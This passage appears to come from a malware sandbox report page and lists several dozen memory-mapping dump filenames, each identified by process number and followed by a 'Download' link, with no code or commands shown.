memory/4760-124-0x0000000000000000-mapping.dmp

Download
memory/4764-94-0x0000000000000000-mapping.dmp

Download
memory/4772-392-0x0000000000000000-mapping.dmp

Download
memory/4776-413-0x0000000000000000-mapping.dmp

Download
memory/4780-396-0x0000000000000000-mapping.dmp

Download
memory/4784-95-0x0000000000000000-mapping.dmp

Download
memory/4788-249-0x0000000000000000-mapping.dmp

Download
memory/4800-226-0x0000000000000000-mapping.dmp

Download
memory/4808-194-0x0000000000000000-mapping.dmp

Download
memory/4812-164-0x0000000000000000-mapping.dmp

Download
memory/4816-133-0x0000000000000000-mapping.dmp

Download
memory/4820-252-0x0000000000000000-mapping.dmp

Download
memory/4824-211-0x0000000000000000-mapping.dmp

Download
memory/4832-239-0x0000000000000000-mapping.dmp

Download
memory/4836-163-0x0000000000000000-mapping.dmp

Download
memory/4840-166-0x0000000000000000-mapping.dmp

Download
memory/4844-267-0x0000000000000000-mapping.dmp

Download
memory/4852-220-0x0000000000000000-mapping.dmp

Download
memory/4860-96-0x0000000000000000-mapping.dmp

Download
memory/4864-167-0x0000000000000000-mapping.dmp

Download
memory/4872-189-0x0000000000000000-mapping.dmp

Download
memory/4876-97-0x0000000000000000-mapping.dmp

Download
memory/4888-131-0x0000000000000000-mapping.dmp

Download
memory/4892-132-0x0000000000000000-mapping.dmp

Download
memory/4896-137-0x0000000000000000-mapping.dmp

Download
memory/4912-190-0x0000000000000000-mapping.dmp

Download
memory/4916-238-0x0000000000000000-mapping.dmp

Download
memory/4920-384-0x0000000000000000-mapping.dmp

Download
memory/4928-266-0x0000000000000000-mapping.dmp

Download
memory/4952-261-0x0000000000000000-mapping.dmp

Download
memory/4960-241-0x0000000000000000-mapping.dmp

Download
memory/4964-135-0x0000000000000000-mapping.dmp

Download
memory/4968-411-0x0000000000000000-mapping.dmp

Download
memory/4972-237-0x0000000000000000-mapping.dmp

Download
memory/4976-98-0x0000000000000000-mapping.dmp

Download
memory/4980-210-0x0000000000000000-mapping.dmp

Download
memory/4988-99-0x0000000000000000-mapping.dmp

Download
memory/4992-162-0x0000000000000000-mapping.dmp

Download
memory/5000-100-0x0000000000000000-mapping.dmp

Download
memory/5004-412-0x0000000000000000-mapping.dmp

Download
memory/5008-129-0x0000000000000000-mapping.dmp

Download
memory/5020-410-0x0000000000000000-mapping.dmp

Download
memory/5024-221-0x0000000000000000-mapping.dmp

Download
memory/5032-161-0x0000000000000000-mapping.dmp

Download
memory/5044-169-0x0000000000000000-mapping.dmp

Download
memory/5048-170-0x0000000000000000-mapping.dmp

Download
memory/5052-138-0x0000000000000000-mapping.dmp

Download
memory/5056-101-0x0000000000000000-mapping.dmp

Download
memory/5072-246-0x0000000000000000-mapping.dmp

Download
memory/5076-102-0x0000000000000000-mapping.dmp

Download
memory/5080-134-0x0000000000000000-mapping.dmp

Download
memory/5088-103-0x0000000000000000-mapping.dmp

Download
memory/5096-198-0x0000000000000000-mapping.dmp

Download
memory/5100-104-0x0000000000000000-mapping.dmp

Download
memory/5104-172-0x0000000000000000-mapping.dmp

Download
memory/5112-191-0x0000000000000000-mapping.dmp

Download